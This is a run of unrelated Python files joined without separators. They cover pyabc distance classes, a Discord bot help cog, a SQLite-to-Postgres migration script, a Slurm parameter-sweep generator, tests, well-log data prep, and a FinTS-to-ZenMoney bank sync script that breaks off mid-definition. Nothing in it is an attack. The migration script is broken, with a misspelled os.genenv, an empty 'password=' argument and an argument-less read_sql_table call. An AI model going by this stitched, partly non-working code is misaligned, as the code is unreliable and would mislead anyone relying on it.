summary statistics. x_0: dict, optional The observed summary statistics. """ def configure_sampler( self, sampler: Sampler): """ This is called by the ABCSMC class and gives the distance the opportunity to configure the sampler. For example, the distance might request the sampler to also return rejected particles in order to adapt the distance to the statistics of the sample. The method is called by the ABCSMC framework before the first used of the distance (at the beginning of ABCSMC.run()), after initialize(). The default is to do nothing. Parameters ---------- sampler: Sampler The sampler used in ABCSMC. """ # pylint: disable=R0201 def update( self, t: int, get_all_sum_stats: Callable[[], List[dict]]) -> bool: """ Update the distance for the upcoming generation t. The default is to do nothing. Parameters ---------- t: int Time point for which to update the distance. get_all_sum_stats: Callable[[], List[dict]] Returns on demand a list of all summary statistics from the finished generation that should be used to update the distance. Returns ------- is_updated: bool Whether the distance has changed compared to beforehand. Depending on the result, the population needs to be updated in ABCSMC before preparing the next generation. Defaults to False. """ return False @abstractmethod def __call__( self, x: dict, x_0: dict, t: int = None, par: dict = None) -> float: """ Evaluate at time point t the distance of the summary statistics of the data simulated for the tentatively sampled particle to those of the observed data. Abstract method. This method has to be overwritten by all concrete implementations. Parameters ---------- x: dict Summary statistics of the data simulated for the tentatively sampled parameter. x_0: dict Summary statistics of the observed data. t: int Time point at which to evaluate the distance. Usually, the distance will not depend on the time. par: dict The parameters used to create the summary statistics x. These can be required by some distance functions. Usually, the distance will not depend on the parameters. Returns ------- distance: float Quantifies the distance between the summary statistics of the data simulated for the tentatively sampled particle and of the observed data. """ def get_config(self) -> dict: """ Return configuration of the distance. Returns ------- config: dict Dictionary describing the distance. """ return {"name": self.__class__.__name__} def to_json(self) -> str: """ Return JSON encoded configuration of the distance. Returns ------- json_str: str: JSON encoded string describing the distance. The default implementation is to try to convert the dictionary returned by ``get_config``. """ return json.dumps(self.get_config()) class NoDistance(Distance): """ Implements a kind of null object as distance function. This can be used as a dummy distance function if e.g. integrated modeling is used. .. note:: This distance function cannot be evaluated, so currently it is in particular not possible to use an epsilon threshold which requires initialization, because during initialization the distance function is invoked directly and not via the acceptor as usual. Conceptually, this would be possible and can be implemented on request. """ def __init__(self): super().__init__() def __call__(self, x: dict, x_0: dict, t: int = None, par: dict = None) -> float: raise Exception( f"{self.__class__.__name__} is not intended to be called.") class IdentityFakeDistance(Distance): """ A fake distance function, which just passes the summary statistics on. This class assumes that the model already returns the distance. This can be useful in cases where simulating can be stopped early, when during the simulation some condition is reached which makes it impossible to accept the particle. """ def __call__(self, x: dict, x_0: dict, t: int = None, par: dict = None) -> float: return x class AcceptAllDistance(Distance): """ Just a mock distance function which always returns -1. So any sample should be accepted for any sane epsilon object. Can be used for testing. """ def __call__(self, x: dict, x_0: dict, t: int = None, par: dict = None) -> float: return -1 class SimpleFunctionDistance(Distance): """ This is a wrapper around a simple function which calculates the distance. If a function/callable is passed to the ABCSMC class, which is not subclassed from pyabc.Distance, then it is converted to an instance of the SimpleFunctionDistance class. Parameters ---------- fun: Callable[[dict, dict], float] A Callable accepting as parameters (a subset of) the arguments of the pyabc.Distance.__call__ function. Usually at least the summary statistics x and x_0. Returns the distance between both. """ def __init__(self, fun): super().__init__() self.fun = fun def __call__(self, x: dict, x_0: dict, t: int = None, par: dict = None) -> float: return self.fun(x, x_0) def get_config(self): conf = super().get_config() # try to get the function name try: conf["name"] = self.fun.__name__ except AttributeError: try: conf["name"] = self.fun.__class__.__name__ except AttributeError: pass return conf def to_distance(maybe_distance): """ Parameters ---------- maybe_distance: either a Callable as in SimpleFunctionDistance, or a pyabc.Distance object. Returns ------- A Distance instance. """ if maybe_distance is None: return NoDistance() if isinstance(maybe_distance, Distance): return maybe_distance return SimpleFunctionDistance(maybe_distance) src/exts/misc.py0 from discord import File from discord.ext.commands import Command, CommandNotFound, is_owner from src.common.common import * INVITE_URL = "https://github.com/DJStompZone/emojis" VOTE_URL = "https://github.com/DJStompZone/emojis" GITHUB_URL = "https://github.com/DJStompZone/emojis" WHATS_NEW = "https://github.com/DJStompZone/emojis" def setup(bot): bot.add_cog(Misc(bot)) class Misc(Cog): __slots__ = ["bot"] def __init__(self, bot): self.bot = bot self.base_help_embed = Embed() self.bot.loop.create_task(self.create_help_embed()) async def create_help_embed(self) -> None: """ Create the top-level help Embed (list of commands). """ embed = Embed() embed.add_field(name="What's new?", value="⭐ %s" % WHATS_NEW, inline=False) # A list of cogs with an extra "Other" cog for uncategorised commands cogs = list(self.bot.cogs) + ["Other"] command_list = {cog: [] for cog in cogs} # Loop through each command and add it to the dictionary for cmd in self.bot.walk_commands(): if not cmd.hidden: cmd_usage = ">" + cmd.name if cmd.cog is not None: command_list[type(cmd.cog).__name__].append(cmd_usage) else: command_list["Other"].append(cmd_usage) # Add each cog's commands to the embed as a new field for name, commands in command_list.items(): if commands: embed.add_field( name=name, value="```\n%s\n```" % "\n".join(sorted(commands)), # Code block ) self.base_help_embed = embed async def get_command_info(self, command_name) -> Command: """ Get information on a command. :param command_name: The command name to look up. :return: The Command object of the command found. """ cmd = self.bot.get_command(command_name) if not cmd: raise CommandNotFound("That command (`%s`) doesn't exist." % command_name) return cmd @command( name="help", description="Get information on the bot.", usage=">help [command]", aliases=("commands",), ) async def help(self, ctx, command_name=None): """ Get help for the bot. Users can specify command_name to get specific help on a command, or omit for a list of commands. :param ctx: :param command_name: [Optional] The command name to look up. """ # Get specific information on a command if command_name: cmd = await self.get_command_info(command_name) embed = ( Embed(title=command_name.lower()) .add_field(name="Description", value=cmd.description or "None") .add_field(name="Usage", value="`%s`" % cmd.usage or "None") .add_field( name="Aliases", value="`%s`" % "`, `".join(cmd.aliases) if cmd.aliases else "None", ) ) await ctx.send(embed=embed) # Get a list of commands else: await ctx.send(embed=self.base_help_embed) @command( name="ping", description="Pong!", usage=">ping", aliases=( "latency", "pong", ), ) async def ping(self, ctx) -> None: """ Get the bot's latency. """ latency = str(round(self.bot.latency * 1000, 2)) + "ms" await ctx.send(embed=Embed(title="Pong :ping_pong: ", description=f"{latency}")) @command( name="invite", description="Invite the bot to your server.", usage=">invite", aliases=("inv",), ) async def invite(self, ctx) -> None: """ Get the invite link for the bot. """ await ctx.send( embed=Embed( description=":orange_heart: **[Click here to invite the bot.](%s)**" % INVITE_URL ) ) # @command( # name="vote", # description="Vote for the bot.", # usage=">vote", # aliases=("v",), # ) # async def vote(self, ctx) -> None: # """ Get the link to vote for the bot. """ # await ctx.send( # embed=Embed( # description=":orange_heart: **[Click here to vote for the bot.](%s)**" # % VOTE_URL # ) # ) # @command( # name="support", # description="Support the bot on GitHub.", # usage=">support", # aliases=( # "supp", # "sup", # ), # ) # async def support(self, ctx) -> None: # """ Get the GitHub link for the bot. """ # await ctx.send( # embed=Embed( # description=":orange_heart: **[Click here to star & watch the bot on GitHub.](%s)**" # % GITHUB_URL # ) # ) # @command( # name="usage", # description="View command usage.", # usage=">usage", # hidden=True, # ) # @is_owner() # async def usage(self, ctx) -> None: # """ View usage stats for the bot. """ # query = db.usage.find({}, {"_id": False}) # async for i in query: # results = dict(i) # sort = sorted(results, key=lambda x: results[x], reverse=True) # usage = ["`>%s`: %d" % (x, results[x]) for x in sort] # pic = None # try: # with open("./data/stats/usage.png", "rb") as f: # pic = File(f) # except OSError: # pass # await ctx.send( # embed=Embed( # description="%s\n\nTotal: %d" # % ("\n".join(usage), sum(results.values())) # ), # file=pic, # ) # return @command( name="reload", description="Reload a cog.", usage=">reload", hidden=True, ) @is_owner() async def reload(self, ctx, cog) -> None: """ Reload a cog. """ await self.bot.reload_extension("src.exts.%s" % cog.lower()) @command( name="servers", description="View the number of servers the bot is in.", usage=">servers", aliases=("guilds",), hidden=True, ) @is_owner() async def servers(self, ctx): """ View the number of servers the bot is in. """ await ctx.send(embed=Embed(description="%d servers" % len(self.bot.guilds))) import psycopg2 import os import sqlite3 import pandas as pd from dotenv import load_dotenv from sqlalchemy import create_engine load_dotenv() SQL_DB_FILEPATH = os.path.join(os.path.dirname(__file__), "..", "module1-introduction-to-sql", "rpg_db.sqlite3") PG_DB_NAME = os.genenv("PG_DB_NAME") PG_DB_USER = os.genenv("PG_DB_USER") PG_DB_PASSWORD = os.genenv("PG_DB_PASSWORD") PG_DB_HOST = os.genenv("PG_DB_HOST") PG_ALCHEMY_ENGINE = os.genenv("PG_ALCHEMY_ENGINE") SQL_ALCHEMY_ENGINE = os.genenv("SQL_ALCHEMY_ENGINE") sqlconn = sqlite3.connect(SQL_DB_FILEPATH) pgconn = psycopg2.connect(dbname=PG_DB_NAME, user=PG_DB_USER, password=, host=PG_DB_HOST) pg_engine = create_engine(PG_ALCHEMY_ENGINE) sql_engine = create_engine(SQL_ALCHEMY_ENGINE) sqlcurs = sqlconn.cursor() pgcurs = pgconn.cursor() # create a list of table names in preparation for our pandas import sql_table_names = [] sql_table_query = """ SELECT name from sqlite_master where type = 'table' """ for table_name in sqlcurs.execute(sql_table_query): pragma_query = f""" PRAGMA foreign_key_list({table_name}) """ foreign_keys = sqlcurs.execute(pragma_query).fetchall() sql_table_names.append(table_name) # create a dictionary of pandas dataframes tables_dict = {} for name in sql_table_names: table = pd.read_sql_table() # another alternative to the below query # ALTER TABLE distributors ADD CONSTRAINT distfk FOREIGN KEY (address) # REFERENCES addresses (address) MATCH FULL; # create tables from pandas to postgresql for i in tables_dict: insert_keys_query = """ ALTER TABLE table_name ADD INDEX(column_name); """ keysend-to-route/test_keysend_to_route.py from keysend_to_route import keysend_to_route route = [{"id":"02dfdcca40725ca204eec5d43a9201ff13fcd057c369c058ce4f19e5c178da09f3","channel":"693998x1139x0","direction":1,"msatoshi":6001,"amount_msat":"6001msat","delay":58,"style":"tlv"},{"id":"","channel":"693777x2877x0","direction":0,"msatoshi":1000,"amount_msat":"1000msat","delay":18,"style":"tlv"}] def test_sendmsg_success(): keysend_to_route(route, is_test=True) """Constructs the script for a Slurm array job that performs a parameter sweep. By default each parameter setting is assigned to its own parallel job. This can be changed with the `runs_per_job` flag to reduce the total number of jobs, in which case multiple parameter settings will be run sequentially in each job. Requirements: python3.6+, numpy, absl-py Example usage: python make_parameter_array_job.py --out=script_name.sh \ --param_linspace="foo,0,3,4" --param_linspace="bar,4.5,5.5,11" \ -- my_script --arg1 Creates script_name.sh that runs "my_script --arg1 --foo=FOO --bar=BAR" for all foo in (0, 1, 2, 3) and all bar in (4.5, 4.6, ..., 5.5) python make_parameter_array_job.py --out=script_name.sh \ --param_logspace="foo,0.01,10,4" -- my_script --arg1 Creates script_name.sh that runs "my_script --arg1 --foo=FOO" for all foo in (0.01, 0.1, 1, 10) """ import math import pathlib import shlex import typing from typing import Iterable, List from absl import app from absl import flags import numpy as np FLAGS = flags.FLAGS flags.DEFINE_string("out", None, "Name for created job script file") flags.mark_flag_as_required("out") flags.DEFINE_string("dir", str(pathlib.Path.home()) + "/jobscripts/", "Base directory for job scripts") flags.DEFINE_string("outdir", str(pathlib.Path.home()) + "/output/", "Base directory for job output") HEADER_FLAGS = ["job-name", "output", "error", "time", "mem", "cpus-per-task"] for header_flag in HEADER_FLAGS: flags.DEFINE_string(header_flag, None, f"Sets the Slurm flag '{header_flag}'") flags.DEFINE_multi_string( "param_linspace", [], "Sweeps linearly spaced values for a parameter." ' Given "NAME,START,STOP,NUM" uses --NAME=x for NUM different x between ' "START and STOP inclusive") flags.DEFINE_multi_string( "param_intlinspace", [], "Sweeps linearly spaced integer values for a " 'parameter Given "NAME,START,STOP,NUM" uses --NAME=x for NUM different x' " between START and STOP inclusive") flags.DEFINE_multi_string( "param_logspace", [], "Sweeps geometrically spaced values for a parameter." ' Given "NAME,START,STOP,NUM" uses --NAME=x for NUM different x between ' "START and STOP inclusive") flags.DEFINE_multi_string( "param_intlogspace", [], "Sweeps geometrically spaced values for a " 'parameter. Given "NAME,START,STOP,NUM" uses --NAME=x for NUM different x ' "between START and STOP inclusive") flags.DEFINE_multi_string( "param_list", [], "Explicit list of values for a parameter. Given in the" ' form "NAME,VAL1,VAL2[,VAL3,...]".') flags.DEFINE_integer("repeat", 1, "Number of times to repeat each parameter setting.") flags.DEFINE_integer("runs_per_job", 1, "Number of parameter to sequentially run in each job") def validate_multiparam_str(param_str: str): """Validates parameter settings for linspace and logspace parameters. Checks that the value is of the form "NAME,START,STOP,NUM" where START and STOP are floats with START <= STOP and NUM is an integer. Args: param_str: The `str` value of the parameter to test. Returns: True if the parameter setting is valid. Raises: flags.ValidationError: The parameter setting is invalid. """ vals = param_str.split(",") if len(vals) != 4: raise flags.ValidationError( 'Array param value must be "NAME,START,STOP,NUM"') try: start = float(vals[1]) stop = float(vals[2]) num = int(vals[3]) except ValueError as e: raise flags.ValidationError( 'Array param "NAME,START,STOP,NUM" must have float' " START and STOP and int NUM") from e if start > stop: raise flags.ValidationError( 'Array param "NAME,START,STOP,NUM" must have START <= STOP') if num < 1: raise flags.ValidationError( 'Array param "NAME,START,STOP,NUM" must have NUM > 0') return True def validate_all_multiparam(param_list: List[str]) -> bool: """Validates a list of parameter settings for linspace/logspace parameters. See validate_multiparam_str() Args: param_list: A list of str parameter values. Returns: True if the each parameter value is valid. Raises: flags.ValidationError: One or more parameter value is invalid. """ for param_str in param_list: valid = validate_multiparam_str(param_str) if not valid: return valid return True def validate_param_list_str(param_str: str): """Validates parameter settings for explicit parameter lists. Checks that the value is of the form "NAME,VAL1,VAL2[,VAL3,...]". Args: param_str: The `str` value of the parameter to test. Returns: True if the parameter setting is valid. Raises: flags.ValidationError: The parameter setting is invalid. """ vals = param_str.split(",") if len(vals) < 3: raise flags.ValidationError( 'param_list value must be "NAME,VAL1,VAL2[,VAL3,...]"') return True def validate_all_param_list(param_list: List[str]) -> bool: """Validates a list of explicitly listed parameters. See validate_param_list_str() Args: param_list: A list of str parameter values. Returns: True if the each parameter value is valid. Raises: flags.ValidationError: One or more parameter value is invalid. """ for param_str in param_list: valid = validate_param_list_str(param_str) if not valid: return valid return True flags.register_validator("param_linspace", validate_all_multiparam) flags.register_validator("param_intlinspace", validate_all_multiparam) flags.register_validator("param_logspace", validate_all_multiparam) flags.register_validator("param_intlogspace", validate_all_multiparam) flags.register_validator("param_list", validate_all_param_list) class ParamArray(typing.NamedTuple): """Collects a parameter name with a list of possible values. Attributes: param: The parameter name. values: A list of str parameter values. """ param: str values: List[str] def parse_param_array(param_str: str, linspace: bool = True, integer: bool = False) -> ParamArray: """Converts a linspace/logspace parameter string into an array of values. The str should be in format "NAME,START,STOP,NUM". See validate_multiparam_str() for more details. Args: param_str: The str value of the parameter. linspace: If true, specifies a linearly spaced array. If false, specifies a geometrically spaced array. integer: Rounds to integer values for the parameter. Duplicate values will be skipped. Returns: A `ParamArray` containing the list of parameter values. """ flag_vals = param_str.split(",") assert len(flag_vals) == 4 start = float(flag_vals[1]) stop = float(flag_vals[2]) num = int(flag_vals[3]) if linspace: param_vals = np.linspace(start, stop, num) else: param_vals = np.logspace(math.log10(start), math.log10(stop), num) if integer: param_vals = np.unique(np.rint(param_vals).astype(np.int)) return ParamArray(flag_vals[0], [str(x) for x in param_vals]) def parse_all_param_arrays(param_list: List[str], linspace: bool = True, integer: bool = False) -> List[ParamArray]: """Parses a list of parameter str values into arrays. See parse_parameter_array() Args: param_list: A list of str values for different parameters. linspace: If true, the strings are for linearly spaced arrays. If false, geometrically spaced arrays. Returns: A list of `ParamArray` containing all parameter values. """ return [parse_param_array(s, linspace=linspace, integer=integer) for s in param_list] def parse_explicit_param_list(param_str: str) -> ParamArray: """Parses parameter values explicitly listed in str form. The str should be in form "NAME,VAL1,VAL2[,VAL3,...]". Args: param_str: The str value of the parameter, in form "NAME,VAL1,VAL2[,VAL3,...]" Returns: A `ParamArray` containing the parameter values. """ tokens = param_str.split(",") assert len(tokens) > 2 return ParamArray(tokens[0], tokens[1:]) def parse_all_param_lists(param_lists: List[str]) -> List[ParamArray]: """Parses a list of param_list values into arrays. See parse_explicit_param_list() Args: param_lists: A list of param_list strs for different parameters. Returns: A list of `ParamArray` containing all parameter values. """ return [parse_explicit_param_list(s) for s in param_lists] def script_header(num_jobs: int) -> List[str]: """Constructs the header of the array job script. Args: num_jobs: The number of parallel jobs in the job array. Returns: A list of header lines for the script. """ assert num_jobs >= 1 header = [] header.append("#!/bin/bash") if num_jobs > 1: header.append(f"#SBATCH --array=1-{num_jobs}") for flag in HEADER_FLAGS: if FLAGS[flag].value: header.append(f"#SBATCH --{flag}={FLAGS[flag].value}") return header def script_param_arrays(param_arrays: Iterable[ParamArray]) -> List[str]: """Constructs the parameter arrays used in the array job script. Args: param_arrays: A list of `ParamArray` representing all possible values for the gridsearch parameters. Returns: A list of array initialization lines for the script. """ result = [] for param_array in param_arrays: result.append(f"{param_array.param}=({' '.join(param_array.values)})") return result def script_param_indexing(array_lengths: Iterable[int], repeat: int) -> List[str]: """Creates the script lines that set parameter indices for a run. Args: array_lengths: The number of parameter settings used for each parameter, in order. repeat: The number of times to repeat each parameter setting Returns: A list of script lines that set the parameter indices. """ indexing = [] indexing.append(f"idx=$((run_index / {repeat}))") for i, l in reversed(list(enumerate(array_lengths))): indexing.append(f"param_index[{i}]=$((idx % {l}))") indexing.append(f"((idx /= {l}))") return indexing def script_run(command: str, param_names: Iterable[str], array_job: bool) -> List[str]: """Creates the script lines that run a single parameter setting. Args: command: The base program string to be executed, without parameter settings. param_names: A list of names for parameters that vary between runs. array_job: True if the runs are split between more than one job. Returns: A list of script runs that set up and execute the run. """ output = [] params = [] for i, name in enumerate(param_names): params.append(f"--{name}=${{{name}[${{param_index[{i}]}}]}}") param_str = " ".join(params) run = [command, param_str] if FLAGS.outdir: if array_job: outfile = (f"{FLAGS.outdir}${{SLURM_JOB_NAME}}" "-${SLURM_ARRAY_JOB_ID}-r${run_index}.out") else: outfile = (f"{FLAGS.outdir}${{SLURM_JOB_NAME}}" "-${SLURM_JOB_ID}-r${run_index}.out") output.append(f'outfile="{outfile}"') output.append('echo "${command}" >> ${outfile}') output.append(f'echo "# {param_str}" | tee -a ${{outfile}}') run.append(" | tee -a ${outfile}") else: output.append(f'echo "# {param_str}"') run_str = " ".join(run) output.append(run_str) return output def script_loop(command: str, param_arrays: List[ParamArray], runs_per_job: int, total_runs: int, repeat: int) -> List[str]: """Constructs the script loop that executes all runs for a job. Args: command: The base program string to be executed, without parameter settings. param_arrays: A list of `ParamArray` that gives the settings for parameters that are varied across runs. Contains the settings for all jobs, not just the current one. runs_per_job: The number of runs executed in each individual job. total_runs: The number of runs executed across all jobs. repeat: Number of times to repeat each parameter setting Returns: A list of script lines for executing all job runs. """ loop = [] initial_index_array = ["0"] * len(param_arrays) loop.append(f"param_index=({' '.join(initial_index_array)})") loop.append(f'command="# {command}"') loop.append("echo ${command}") loop.append(f"for ((run=0; run < {runs_per_job}; run++)); do") inner = [] if runs_per_job < total_runs: inner.append( f"run_index=$(({runs_per_job}*$((${{SLURM_ARRAY_TASK_ID}} - 1))" " + ${run}))") else: inner.append("run_index=${run}") inner.append(f'if [[ "${{run_index}}" -ge {total_runs} ]]; then') inner.append(" break") inner.append("fi") inner += script_param_indexing((len(pa.values) for pa in param_arrays), repeat) inner.append("") inner += script_run(command, (pa.param for pa in param_arrays), (runs_per_job < total_runs)) loop += [" " + line for line in inner] loop.append("done") return loop def main(argv): param_arrays = ( parse_all_param_arrays(FLAGS.param_linspace, linspace=True) + parse_all_param_arrays(FLAGS.param_intlinspace, linspace=True, integer=True) + parse_all_param_arrays(FLAGS.param_logspace, linspace=False) + parse_all_param_arrays(FLAGS.param_intlogspace, linspace=False, integer=True) + parse_all_param_lists(FLAGS.param_list)) repeat = FLAGS.repeat; if repeat < 1: print(f"Invalid repeat count {repeat}. Set to 1 for no repeat.") return -1 total_runs = math.prod(len(pa.values) for pa in param_arrays) total_runs *= repeat runs_per_job = FLAGS.runs_per_job num_jobs = (total_runs + (runs_per_job - 1)) // runs_per_job # ceiling div if FLAGS.outdir: outdir = pathlib.Path(FLAGS.outdir) if not outdir.is_dir(): print("Invalid output directory", outdir) return -1 outdir = outdir.resolve() if not FLAGS.output: if num_jobs > 1: FLAGS.output = str(outdir / "%x-%A-j%a.out") else: FLAGS.output = str(outdir / "%x-%j-j0.out") if not FLAGS.error: if num_jobs > 1: FLAGS.error = str(outdir / "%x-%A-j%a.err") else: FLAGS.error = str(outdir / "%x-%j-j0.err") script = script_header(num_jobs) script.append("") script += script_param_arrays(param_arrays) script.append("") script += script_loop(" ".join(shlex.quote(s) for s in argv[1:]), param_arrays, runs_per_job, total_runs, repeat) scriptdir = pathlib.Path(FLAGS.dir) if not scriptdir.is_dir(): print("Invalid script directory", scriptdir) return -1 script_path = scriptdir / FLAGS.out with script_path.open("w") as jobscript: print("\n".join(script), file=jobscript) if __name__ == "__main__": app.run(main) import unittest from site_analysis.polyhedral_site_collection import PolyhedralSiteCollection from site_analysis.polyhedral_site import PolyhedralSite from unittest.mock import patch, Mock class PolyhedralSiteCollectionTestCase(unittest.TestCase): def test_site_collection_is_initialised(self): sites = [Mock(spec=PolyhedralSite), Mock(spec=PolyhedralSite)] with patch('site_analysis.polyhedral_site_collection' '.construct_neighbouring_sites') as mock_construct_neighbouring_sites: mock_construct_neighbouring_sites.return_value = 'foo' site_collection = PolyhedralSiteCollection(sites=sites) self.assertEqual(site_collection.sites, sites) mock_construct_neighbouring_sites.assert_called_with(site_collection.sites) self.assertEqual(site_collection._neighbouring_sites, 'foo') if __name__ == '__main__': unittest.main() 1-10 """ Code to load and prep data """ import pandas as pd import numpy as np import os def load_log_data(): """ Return pandas dataframe of log data """ csv_path = os.path.join(os.path.dirname(__file__), '../data/HACKA_DS.csv') df = (pd.read_csv(csv_path, sep=';') .rename(columns=lambda x: x.strip()) ) return df def resample_well(df_well, feature_cols, sample_step): """ Resamples and interpolates data in a single well. """ # Resample df_well = df_well.copy() df_well = df_well.set_index('TVDSS') new_index = np.arange(int(df_well.index.min()), df_well.index.max(), sample_step) df_well = df_well.reindex(new_index, method='nearest', tolerance=sample_step) # Interpolate #for col in feature_cols: # df_well[col] = df_well[col].interpolate(method='index', limit=5, limit_area='inside') df_well.interpolate(method='index', limit=5, limit_area='inside', inplace=True) # Fill in nans for col in ['HACKANAME', 'RES_ID']: df_well[col] = df_well[col].fillna(method='bfill').fillna(method='ffill') return df_well.reset_index() def create_ml_dataframe(df, feature_cols=['GR'], feature_lags=range(0, 50, 2), label_cols=['GR'], label_lags=[2, 4, 6, 8, 10], dropna=True, sample_step=0.2): """ Create dataframe with 'features' and 'labels', from the raw log dataframe """ # Drop unused columns cols_to_keep = list(set(['TVDSS', 'HACKANAME', 'RES_ID'] + feature_cols + label_cols)) df_ml = df[cols_to_keep].copy() # Process each well in turn on TVDSS index df_ml = (df_ml.groupby('HACKANAME') .apply(resample_well, feature_cols, sample_step) .reset_index(drop=True)) # Feature lagging (above the current bit depth) for col in feature_cols: for lag in feature_lags: kwargs = {col + '_lag_' + str(lag): lambda x: x.groupby('HACKANAME')[col].shift(lag)} df_ml = df_ml.assign(**kwargs) # Label lagging (below the current bit depth) for col in label_cols: for lag in label_lags: kwargs = {col + '_futr_' + str(lag): lambda x: x.groupby('HACKANAME')[col].shift(-lag)} df_ml = df_ml.assign(**kwargs) if dropna: df_ml = df_ml.dropna() return df_ml def get_log_predictions(df_pred, well_name, bit_depth, tol=1): """ Lookup predictions indexed by depth """ prediction_col_names = [c for c in df_pred if 'pred' in c] pred_row = df_pred[(df_pred.HACKANAME == well_name) & (df_pred.TVDSS > bit_depth - tol) & (df_pred.TVDSS < bit_depth + tol) ] assert len(pred_row) > 0, 'No predictions found for that well near that depth' pred_row = pred_row.iloc[0:1, :] result = (pd.melt(pred_row, id_vars=['HACKANAME', 'TVDSS'], value_vars=prediction_col_names, var_name='pred_col' ) .rename(columns={'TVDSS': 'TVDSS_bit_depth'}) .assign(offset=lambda x: x['pred_col'].str.extract('(\d+)').astype('float')) .assign(log_name=lambda x: x['pred_col'].str.split('_').str[0]) .assign(model_name=lambda x: x['pred_col'].str.split('_').str[-1]) .assign(TVDSS=lambda x: x['TVDSS_bit_depth'] + x['offset']) ) return result fints2zen.py #!/usr/bin/env python # from argparse import ArgumentParser import os from argparse import ArgumentParser, Namespace, ArgumentDefaultsHelpFormatter from cerberus import Validator from datetime import datetime from fints.client import FinTS3PinTanClient from pprint import pprint from re import search from sys import exit, stderr from uuid import uuid4 from yaml import safe_load, dump from yaml.scanner import ScannerError from zenmoney import ( Diff, OAuth2, Request, Transaction, ZenObjectsList, timestamp, ZenMoneyException ) ''' First connection: * Get credentials for bank fin-ts (HBCI) and account info ''' class InterTransaction(tuple): ''' Helping class to sorting transactions by first element ''' def __lt__(self, other): return self[0] < other[0] class InterTransactions(list): ''' Intermidiate class to compare transaction from zenmoney and fints ''' def keys(self): return [i[0] for i in self] def compare_to(self, obj): s_only = self[:] o_only = obj[:] both = [] for s in s_only[:]: try: index = [o[0] for o in o_only].index(s[0]) both.append(((s[0]), ())) del(o_only[index]) s_only.remove(s) except ValueError: continue s_only.sort() o_only.sort() both.sort() return(InterTransactions(s_only), InterTransactions(both), InterTransactions(o_only)) class FinTs(object): ''' Class for data from FinTS banking API ''' date_patterns = ( # 2019-02-12T17:05:47 \/ (r'\d{4}-\d\d-\d\dT\d\d:\d\d:\d\d', '%Y-%m-%dT%H:%M:%S'), (r'\d{4}\.\d\d\.\d\dT\d\d\.\d\d\.\d\d', '%Y.%m.%dT%H.%M.%S'), (r'\d\d\.\d\d \d{6}', '%d.%m %H%M%S'), # 14.02 163532 : 14.02163532ARN (r'\d\d\.\d{8}ARN', '%d.%m%H%M%SARN'), # 21.02164412ARN (r'\d\d\.\d\d \d\d\.\d\d', '%d.%m %H.%M'), # 12.02 09.56 # 08.01 09:00 : 08.0109.00 (r' \d\d\.\d\d \d\d:\d\d ', ' %d.%m %H:%M '), (r' \d\d\.\d{4}\.\d\d ', ' %d.%m%H.%M '), # 08.0109.00 (r'\d\d\.\d\d\.\d{4}', '%d.%m.%Y'), # 01.02.2019 ) transaction_types = ( # Type by posting_text ('Entgelt', 'Fee'), ('Gehalt/Rente', 'Salary/Pension'), ('Abbuchung', 'Debit entry'), ('Gutschrift', 'Credit/Top up'), ('Überweisung', 'Transfer'), ) def __init__(self, blz: str, username: str, pin: str, url: str, *args, **kwargs): _fints = FinTS3PinTanClient( str(blz), str(username), str(pin), str(url), *args, **kwargs, ) self.accounts = _fints.get_sepa_accounts() self.balance = {} self.transactions = {} for a in self.accounts: self.balance[a.iban] = _fints.get_balance(a) self.transactions[a.iban] = _fints.get_transactions(a) def _get_date(self, string, booking_date): ''' Accepts array from transaction info, returns the date First tries to get data from regexp+string format Then removes spaces from info string and tries to get isoformat Then returns date 'Buchung' (booking) ''' date = None for pattern in FinTs.date_patterns: s = search(pattern[0], string) if s: try: date = datetime.strptime(s[0], pattern[1]).date() except ValueError: # Trying to mitigate bools-t like 08.12360904ARN date = datetime.strptime(s[0][:5], '%d.%m').date() if not date: date = booking_date if date.year == 1900: if booking_date.month == 1 and date.month == 12: date = date.replace(year=booking_date.year-1) else: date = date.replace(year=booking_date.year) return str(date) def get_transactions(self, iban: str, account_uuid: str, transfer_uuid: str): ''' iban: the IBAN number in account account_uuid: account ID in zenmoney for the IBAN transfer_uuid: zenmoney account UUID for default withdraw ''' transactions = InterTransactions() for tr in self.transactions[iban]: tr = tr.data date = self._get_date(str(tr['purpose']), tr['date']) amount = float(tr['amount'].amount) # payee could be None payee = tr['applicant_name'] or '' if 0 < amount: income_amount = amount outcome_amount = 0.0 income_account = account_uuid outcome_account = account_uuid elif amount < 0: income_amount = 0.0 outcome_amount = -amount outcome_account = account_uuid # IngDiba related if payee.startswith('Bargeldauszahlung '): # If payee starts with the word, this is a withdraw payee = payee[18:] income_account = transfer_uuid income_amount = outcome_amount else: income_account = account_uuid else: # ignore service messages with amount == 0 continue # IngDiba related if payee.startswith('VISA '): payee = payee[5:] currency = tr['currency'] comment = tr['purpose'] transactions.append(InterTransaction(( (date, amount, currency), {'date': date, 'income': income_amount, 'incomeAccount': income_account, 'incomeInstrument': 3, 'outcome': outcome_amount, 'outcomeAccount': outcome_account, 'outcomeInstrument': 3, 'originalPayee': payee.strip(), 'payee': payee.strip(), 'comment': comment, 'id': str(uuid4()), # '__raw': tr, } ))) return transactions class Zen(object): ''' Class for data from ZenMoney API ''' def __init__(self, token: str, serverTimestamp: int): self.api = Request(token) self.diff = self.api.diff(Diff( serverTimestamp=serverTimestamp, forceFetch=[ 'instrument', 'user', ]) ) def get_transactions(self, account_uuid: str): def get_amount(tr: Transaction): if tr.incomeAccount == tr.outcomeAccount == account_uuid: # Normal transaction amount = max(tr.income, tr.outcome) if 0 < tr.outcome: amount = -amount return amount, 'income' elif tr.incomeAccount == account_uuid: return tr.income, 'income' elif tr.outcomeAccount == account_uuid: return -tr.outcome, 'outcome' else: raise Exception('Something is definitely broken') transactions = InterTransactions() for tr in self.diff.transaction.by_account(account_uuid): if tr.deleted: continue amount, tr_type = get_amount(tr) tr_currency_id = getattr(tr, tr_type + 'Instrument') currency = self.diff.instrument.by_id(tr_currency_id).shortTitle transactions.append(InterTransaction(( ( str(tr.date), amount, currency ), {'date': tr.date, 'income': tr.income, 'incomeAccount': tr.incomeAccount, 'incomeInstrument': tr.incomeInstrument, 'outcome': tr.outcome, 'outcomeAccount': tr.outcomeAccount, 'outcomeInstrument': tr.outcomeInstrument, 'originalPayee': tr.originalPayee, 'comment': tr.comment, 'id': tr.id, } ))) return transactions v = Validator({ 'bank': {'type': 'dict', 'required': True, 'schema': { 'blz': {'required': True, 'type': 'integer'}, 'username': { 'required': True, 'anyof_type': ['string', 'integer'], }, 'pin': {'required': True, 'type': 'string'}, 'url': {'required': True, 'type': 'string'}, }}, 'zenmoney': {'required': True, 'type': 'dict', 'schema': { 'token': {'required': True, 'type': 'string'}, 'withdraw_account': {'required': True, 'type': 